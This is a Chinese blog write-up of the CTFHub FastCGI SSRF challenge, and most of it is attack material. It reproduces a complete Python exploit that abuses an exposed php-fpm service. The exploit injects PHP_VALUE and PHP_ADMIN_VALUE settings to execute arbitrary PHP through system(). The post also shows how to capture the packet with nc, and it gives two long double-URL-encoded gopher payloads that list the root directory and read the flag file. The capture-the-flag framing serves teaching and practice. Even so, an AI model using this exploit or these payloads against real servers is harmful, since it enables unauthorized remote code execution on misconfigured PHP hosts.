ctfhub-fastcgi协议

最新推荐文章于 2024-03-29 18:33:49 发布
最新推荐文章于 2024-03-29 18:33:49 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: # CTFHUB 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51652864/article/details/118697060
版权

ctfhub-fastcgi协议
这道题是关于fastcgi协议的东西,具体的fastcgi的东西就不介绍了,附件有,网上也有很多师傅写了的,我这里就直接说下题的思路

fastcgi是向php-fpm发送报文的,而由于php-fpm的默认端口是9000,所以我们用nc去监听下9000端口

nc -lvvp 9000>yy.txt

使用大师傅的exp去打就行:

import socket
import random
import argparse
import sys
from io import BytesIO

# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client

PY2 = True if sys.version_info.major == 2 else False


def bchr(i):
    if PY2:
        return force_bytes(chr(i))
    else:
        return bytes([i])

def bord(c):
    if isinstance(c, int):
        return c
    else:
        return ord(c)

def force_bytes(s):
    if isinstance(s, bytes):
        return s
    else:
        return s.encode('utf-8', 'strict')

def force_text(s):
    if issubclass(type(s), str):
        return s
    if isinstance(s, bytes):
        s = str(s, 'utf-8', 'strict')
    else:
        s = str(s)
    return s


class FastCGIClient:
    """A Fast-CGI Client for Python"""

    # private
    __FCGI_VERSION = 1

    __FCGI_ROLE_RESPONDER = 1
    __FCGI_ROLE_AUTHORIZER = 2
    __FCGI_ROLE_FILTER = 3

    __FCGI_TYPE_BEGIN = 1
    __FCGI_TYPE_ABORT = 2
    __FCGI_TYPE_END = 3
    __FCGI_TYPE_PARAMS = 4
    __FCGI_TYPE_STDIN = 5
    __FCGI_TYPE_STDOUT = 6
    __FCGI_TYPE_STDERR = 7
    __FCGI_TYPE_DATA = 8
    __FCGI_TYPE_GETVALUES = 9
    __FCGI_TYPE_GETVALUES_RESULT = 10
    __FCGI_TYPE_UNKOWNTYPE = 11

    __FCGI_HEADER_SIZE = 8

    # request state
    FCGI_STATE_SEND = 1
    FCGI_STATE_ERROR = 2
    FCGI_STATE_SUCCESS = 3

    def __init__(self, host, port, timeout, keepalive):
        self.host = host
        self.port = port
        self.timeout = timeout
        if keepalive:
            self.keepalive = 1
        else:
            self.keepalive = 0
        self.sock = None
        self.requests = dict()

    def __connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # if self.keepalive:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)
        # else:
        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)
        try:
            self.sock.connect((self.host, int(self.port)))
        except socket.error as msg:
            self.sock.close()
            self.sock = None
            print(repr(msg))
            return False
        return True

    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):
        length = len(content)
        buf = bchr(FastCGIClient.__FCGI_VERSION) \
               + bchr(fcgi_type) \
               + bchr((requestid >> 8) & 0xFF) \
               + bchr(requestid & 0xFF) \
               + bchr((length >> 8) & 0xFF) \
               + bchr(length & 0xFF) \
               + bchr(0) \
               + bchr(0) \
               + content
        return buf

    def __encodeNameValueParams(self, name, value):
        nLen = len(name)
        vLen = len(value)
        record = b''
        if nLen < 128:
            record += bchr(nLen)
        else:
            record += bchr((nLen >> 24) | 0x80) \
                      + bchr((nLen >> 16) & 0xFF) \
                      + bchr((nLen >> 8) & 0xFF) \
                      + bchr(nLen & 0xFF)
        if vLen < 128:
            record += bchr(vLen)
        else:
            record += bchr((vLen >> 24) | 0x80) \
                      + bchr((vLen >> 16) & 0xFF) \
                      + bchr((vLen >> 8) & 0xFF) \
                      + bchr(vLen & 0xFF)
        return record + name + value

    def __decodeFastCGIHeader(self, stream):
        header = dict()
        header['version'] = bord(stream[0])
        header['type'] = bord(stream[1])
        header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])
        header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])
        header['paddingLength'] = bord(stream[6])
        header['reserved'] = bord(stream[7])
        return header

    def __decodeFastCGIRecord(self, buffer):
        header = buffer.read(int(self.__FCGI_HEADER_SIZE))

        if not header:
            return False
        else:
            record = self.__decodeFastCGIHeader(header)
            record['content'] = b''

            if 'contentLength' in record.keys():
                contentLength = int(record['contentLength'])
                record['content'] += buffer.read(contentLength)
            if 'paddingLength' in record.keys():
                skiped = buffer.read(int(record['paddingLength']))
            return record

    def request(self, nameValuePairs={}, post=''):
        if not self.__connect():
            print('connect failure! please check your fasctcgi-server !!')
            return

        requestId = random.randint(1, (1 << 16) - 1)
        self.requests[requestId] = dict()
        request = b""
        beginFCGIRecordContent = bchr(0) \
                                 + bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \
                                 + bchr(self.keepalive) \
                                 + bchr(0) * 5
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,
                                              beginFCGIRecordContent, requestId)
        paramsRecord = b''
        if nameValuePairs:
            for (name, value) in nameValuePairs.items():
                name = force_bytes(name)
                value = force_bytes(value)
                paramsRecord += self.__encodeNameValueParams(name, value)

        if paramsRecord:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)

        if post:
            request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)
        request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)

        self.sock.send(request)
        self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SEND
        self.requests[requestId]['response'] = b''
        return self.__waitForResponse(requestId)

    def __waitForResponse(self, requestId):
        data = b''
        while True:
            buf = self.sock.recv(512)
            if not len(buf):
                break
            data += buf

        data = BytesIO(data)
        while True:
            response = self.__decodeFastCGIRecord(data)
            if not response:
                break
            if response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \
                    or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:
                    self.requests['state'] = FastCGIClient.FCGI_STATE_ERROR
                if requestId == int(response['requestId']):
                    self.requests[requestId]['response'] += response['content']
            if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:
                self.requests[requestId]
        return self.requests[requestId]['response']

    def __repr__(self):
        return "fastcgi connect host:{} port:{}".format(self.host, self.port)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')
    parser.add_argument('host', help='Target host, such as 127.0.0.1')
    parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')
    parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')
    parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)

    args = parser.parse_args()

    client = FastCGIClient(args.host, args.port, 3, 0)
    params = dict()
    documentRoot = "/"
    uri = args.file
    content = args.code
    params = {
        'GATEWAY_INTERFACE': 'FastCGI/1.0',
        'REQUEST_METHOD': 'POST',
        'SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),
        'SCRIPT_NAME': uri,
        'QUERY_STRING': '',
        'REQUEST_URI': uri,
        'DOCUMENT_ROOT': documentRoot,
        'SERVER_SOFTWARE': 'php/fcgiclient',
        'REMOTE_ADDR': '127.0.0.1',
        'REMOTE_PORT': '9985',
        'SERVER_ADDR': '127.0.0.1',
        'SERVER_PORT': '80',
        'SERVER_NAME': "localhost",
        'SERVER_PROTOCOL': 'HTTP/1.1',
        'CONTENT_TYPE': 'application/text',
        'CONTENT_LENGTH': "%d" % len(content),
        'PHP_VALUE': 'auto_prepend_file = php://input',
        'PHP_ADMIN_VALUE': 'allow_url_include = On'
    }
    response = client.request(params, content)

使用方式是:
python fpm.py -c “php代码” -p 9000 ip地址 任意php文件路径

python fpm.py -c "<?php var_dump(system('ls /'));?>" -p 9000 0.0.0.0 /usr/local/lib/php/PEAR.php

在这里插入图片描述
接着打开监听到的文件:
在这里插入图片描述
但这种数据并不能够直接用,我们要用的是hex的编码,但在hexdump下是位置低的显示在前,所以我们得将其转换位置为:

hexdump -C yy.txt>1.txt

在这里插入图片描述
接着去掉多于的数据,保留中间的数字进行两次url编码,(要去掉空格以及换行符)即可:

payload=%2501%2501%25f4%255e%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%25f4%255e%2501%25e7%2500%2500%250e%2502%2543%254f%254e%2554%2545%254e%2554%255f%254c%2545%254e%2547%2554%2548%2533%2533%250c%2510%2543%254f%254e%2554%2545%254e%2554%255f%2554%2559%2550%2545%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2574%2565%2578%2574%250b%2504%2552%2545%254d%254f%2554%2545%255f%2550%254f%2552%2554%2539%2539%2538%2535%250b%2509%2553%2545%2552%2556%2545%2552%255f%254e%2541%254d%2545%256c%256f%2563%2561%256c%2568%256f%2573%2574%2511%250b%2547%2541%2554%2545%2557%2541%2559%255f%2549%254e%2554%2545%2552%2546%2541%2543%2545%2546%2561%2573%2574%2543%2547%2549%252f%2531%252e%2530%250f%250e%2553%2545%2552%2556%2545%2552%255f%2553%254f%2546%2554%2557%2541%2552%2545%2570%2568%2570%252f%2566%2563%2567%2569%2563%256c%2569%2565%256e%2574%250b%2509%2552%2545%254d%254f%2554%2545%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250f%251b%2553%2543%2552%2549%2550%2554%255f%2546%2549%254c%2545%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%250b%251b%2553%2543%2552%2549%2550%2554%255f%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2509%251f%2550%2548%2550%255f%2556%2541%254c%2555%2545%2561%2575%2574%256f%255f%2570%2572%2565%2570%2565%256e%2564%255f%2566%2569%256c%2565%2520%253d%2520%2570%2568%2570%253a%252f%252f%2569%256e%2570%2575%2574%250e%2504%2552%2545%2551%2555%2545%2553%2554%255f%254d%2545%2554%2548%254f%2544%2550%254f%2553%2554%250b%2502%2553%2545%2552%2556%2545%2552%255f%2550%254f%2552%2554%2538%2530%250f%2508%2553%2545%2552%2556%2545%2552%255f%2550%2552%254f%2554%254f%2543%254f%254c%2548%2554%2554%2550%252f%2531%252e%2531%250c%2500%2551%2555%2545%2552%2559%255f%2553%2554%2552%2549%254e%2547%250f%2516%2550%2548%2550%255f%2541%2544%254d%2549%254e%255f%2556%2541%254c%2555%2545%2561%256c%256c%256f%2577%255f%2575%2572%256c%255f%2569%256e%2563%256c%2575%2564%2565%2520%253d%2520%254f%256e%250d%2501%2544%254f%2543%2555%254d%2545%254e%2554%255f%2552%254f%254f%2554%252f%250b%2509%2553%2545%2552%2556%2545%2552%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250b%251b%2552%2545%2551%2555%2545%2553%2554%255f%2555%2552%2549%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2501%2504%25f4%255e%2500%2500%2500%2500%2501%2505%25f4%255e%2500%2521%2500%2500%253c%253f%2570%2568%2570%2520%2576%2561%2572%255f%2564%2575%256d%2570%2528%2573%2579%2573%2574%2565%256d%2528%2527%256c%2573%2520%252f%2527%2529%2529%253b%253f%253e%2501%2505%25f4%255e%2500%2500%2500%2500

用gopher协议去请求:
gopher://127.0.0.1:9000/_payload
在这里插入图片描述
然后cat flag_1951f8104d94d2c2082aea8d92253481即可:

python fpm.py -c "<?php var_dump(system('cat /flag_1951f8104d94d2c2082aea8d92253481'));?>" -p 9000 0.0.0.0 /usr/local/lib/php/PEAR.php

步骤同上面一样:
得到的二次url编码为:

%2501%2501%2507%25e1%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2507%25e1%2501%25e7%2500%2500%250e%2502%2543%254f%254e%2554%2545%254e%2554%255f%254c%2545%254e%2547%2554%2548%2537%2531%250c%2510%2543%254f%254e%2554%2545%254e%2554%255f%2554%2559%2550%2545%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2574%2565%2578%2574%250b%2504%2552%2545%254d%254f%2554%2545%255f%2550%254f%2552%2554%2539%2539%2538%2535%250b%2509%2553%2545%2552%2556%2545%2552%255f%254e%2541%254d%2545%256c%256f%2563%2561%256c%2568%256f%2573%2574%2511%250b%2547%2541%2554%2545%2557%2541%2559%255f%2549%254e%2554%2545%2552%2546%2541%2543%2545%2546%2561%2573%2574%2543%2547%2549%252f%2531%252e%2530%250f%250e%2553%2545%2552%2556%2545%2552%255f%2553%254f%2546%2554%2557%2541%2552%2545%2570%2568%2570%252f%2566%2563%2567%2569%2563%256c%2569%2565%256e%2574%250b%2509%2552%2545%254d%254f%2554%2545%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250f%251b%2553%2543%2552%2549%2550%2554%255f%2546%2549%254c%2545%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%250b%251b%2553%2543%2552%2549%2550%2554%255f%254e%2541%254d%2545%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2509%251f%2550%2548%2550%255f%2556%2541%254c%2555%2545%2561%2575%2574%256f%255f%2570%2572%2565%2570%2565%256e%2564%255f%2566%2569%256c%2565%2520%253d%2520%2570%2568%2570%253a%252f%252f%2569%256e%2570%2575%2574%250e%2504%2552%2545%2551%2555%2545%2553%2554%255f%254d%2545%2554%2548%254f%2544%2550%254f%2553%2554%250b%2502%2553%2545%2552%2556%2545%2552%255f%2550%254f%2552%2554%2538%2530%250f%2508%2553%2545%2552%2556%2545%2552%255f%2550%2552%254f%2554%254f%2543%254f%254c%2548%2554%2554%2550%252f%2531%252e%2531%250c%2500%2551%2555%2545%2552%2559%255f%2553%2554%2552%2549%254e%2547%250f%2516%2550%2548%2550%255f%2541%2544%254d%2549%254e%255f%2556%2541%254c%2555%2545%2561%256c%256c%256f%2577%255f%2575%2572%256c%255f%2569%256e%2563%256c%2575%2564%2565%2520%253d%2520%254f%256e%250d%2501%2544%254f%2543%2555%254d%2545%254e%2554%255f%2552%254f%254f%2554%252f%250b%2509%2553%2545%2552%2556%2545%2552%255f%2541%2544%2544%2552%2531%2532%2537%252e%2530%252e%2530%252e%2531%250b%251b%2552%2545%2551%2555%2545%2553%2554%255f%2555%2552%2549%252f%2575%2573%2572%252f%256c%256f%2563%2561%256c%252f%256c%2569%2562%252f%2570%2568%2570%252f%2550%2545%2541%2552%252e%2570%2568%2570%2501%2504%2507%25e1%2500%2500%2500%2500%2501%2505%2507%25e1%2500%2547%2500%2500%253c%253f%2570%2568%2570%2520%2576%2561%2572%255f%2564%2575%256d%2570%2528%2573%2579%2573%2574%2565%256d%2528%2527%2563%2561%2574%2520%252f%2566%256c%2561%2567%255f%2531%2539%2535%2531%2566%2538%2531%2530%2534%2564%2539%2534%2564%2532%2563%2532%2530%2538%2532%2561%2565%2561%2538%2564%2539%2532%2532%2535%2533%2534%2538%2531%2527%2529%2529%253b%253f%253e%2501%2505%2507%25e1%2500%2500%2500%2500

gopher请求即可:
在这里插入图片描述

o3Ev
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
处理(php-cgi.exe - FastCGI 进程超过了配置的请求超时时限)的问题
10-27
本篇文章是对解决(php-cgi.exe - FastCGI 进程超过了配置的请求超时时限)的问题进行了详细的分析介绍,需要的朋友参考下
ctfhub fastcgi
winofkill的博客
12-11 2018
fastcgi
CTFHub-FastCGI协议及其ssrf漏洞
XYH_233的博客
02-04 584
FastCGI协议和HTTP协议一样是通信协议
CTFHUB--SSRF(中)--FastCGI协议\Redis协议 以及gopherus工具攻击
最新发布
qq_75120258的博客
03-29 1130
本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
ctfhub利用SSRF攻击内网FastCGI协议
qq_64201116的博客
06-23 2137
SSRF初步理解与探究
CTFHUB-SSRF-FastCGI协议
qq_62078839的博客
04-23 1777
Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 第一种方式 exp import socket import random import argparse import sys from io import BytesIO # Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client PY2 = True if sys.version_info.major == 2 el
SSRF - ctfhub -2【FastCGI协议、Redis协议、URL Bypass、数字IP Bypass、302跳转 Bypass、DNS重绑定Bypass】
bin789456的博客
11-18 2197
FastCGI协议 知识参考:CTFhub官方链接 首先介绍一下原理(这里简单介绍,详情请看官方附件) 如果说HTTP来完成浏览器到中间件的请求,那么FastCGI就是从中间件到某语言后端进行交换的协议。 和浏览器请求包一样,也是由header、body组成。 还需要提到一个PHP-FPM,FastCGI进程管理器,即在php中(nginx等服务器中间件)FastCGI规则打包好后传递的终点,最后由FPM按照fastcgi协议将TCP流解析成真正的数据。 比如打包好的数据长这样 { 'GATEWA
SSRF详解 基于CTFHub(下篇)
Bossfrank的博客
04-28 1046
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
CTFHub ssfr FastCgi协议 & Redis 协议
m0_62879498的博客
02-18 1779
ctfhub ssfr FastCgi & Redis 协议 FastCgi协议 这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助 首先我们要先了解这个协议内容(具体查看ctfhub里面的文章) 在本关我们可以尝试使用linux解决问题(**需要下载python2版本!!!,否则Gopherus无法读取 **并且下载Gopherus脚本) linux python2下载方法: [参考博客]((1条消息) 完美解决 Linux安装python2.7 方案_你懂了我的冬天的博客
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 911
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
node-fastcgi:使用node.js创建FastCGI应用程序
02-05
节点fastcgi 该模块是节点标准HTTP模块(仅服务器)的直接替代。 使用FastCGI无需更改为http服务器编写的代码即可正常工作。 它可用于构建FastCGI应用程序或将现有的节点应用程序转换为FastCGI。 该实现完全符合。...
基于java的开发源码-FastCGI网关 jFastCGI.zip
01-07
基于java的开发源码-FastCGI网关 jFastCGI.zip 基于java的开发源码-FastCGI网关 jFastCGI.zip 基于java的开发源码-FastCGI网关 jFastCGI.zip 基于java的开发源码-FastCGI网关 jFastCGI.zip 基于java的开发源码-...
php5-fastcgi:PHP FastCGI扩展
05-01
php5-fastcgi 此扩展是实验性的。 该扩展通过FastCGIApplication类为PHP应用程序提供了libfcgi的某些功能。正在安装以下这些说明用于在运行Ubuntu 64位服务器15.04的虚拟机上安装扩展。 sudo apt-get install ...
node-fastcgi-client:Node.js中的FastCGI客户端实现,主要设计用于PHP的累积量
05-05
节点-fastcgi-客户端 Node.js中的FastCGI客户端实现,主要设计用于PHP的累积量。 发展状况 发展。 很快就会稳定。 原料药 npm install fastcgi-client 。 使用require('fastcgi-client')获得一个fastcgiConnector 。...
Ctfhub-FastCGI
鸣蜩十四的博客
08-09 482
我们登陆环境,目前可以知道他的默认网站目录/var/www/html/index.php,我们可以使用gopherus工具,进行写入webshell, 第一个为网站的php文件的地址,下面的为写入一句话木马到网站的对应位置,然后将payload进行一次url编码,在brup中写入 成功,然后用蚁剑链接,找到flag ...
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 2618
SSRF相关题目实战
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2023
ssrf
4-14、FastCGI协议理论讲解
wade1010的专栏
08-07 656
一般情况下,最先发送的是FCGI_BEGIN_REQUEST类型的消息,然后是FCGI_PARAMS和FCGI_STDIN类型的消息,当FastCGI响应处理完后,将发送FCGI_STDOUT和FCGI_STDERR类型的消息,最后以FCGI_END_REQUEST表示请求的结束。在fcgi_finish_request中调用fcgi_flush,fcgi_flush中封装一个FCGI_END_REQUEST消息体,再通过safe_write写入 socket 连接的客户端描述符。
CTFHub ssrf
07-29
- *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

o3Ev

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值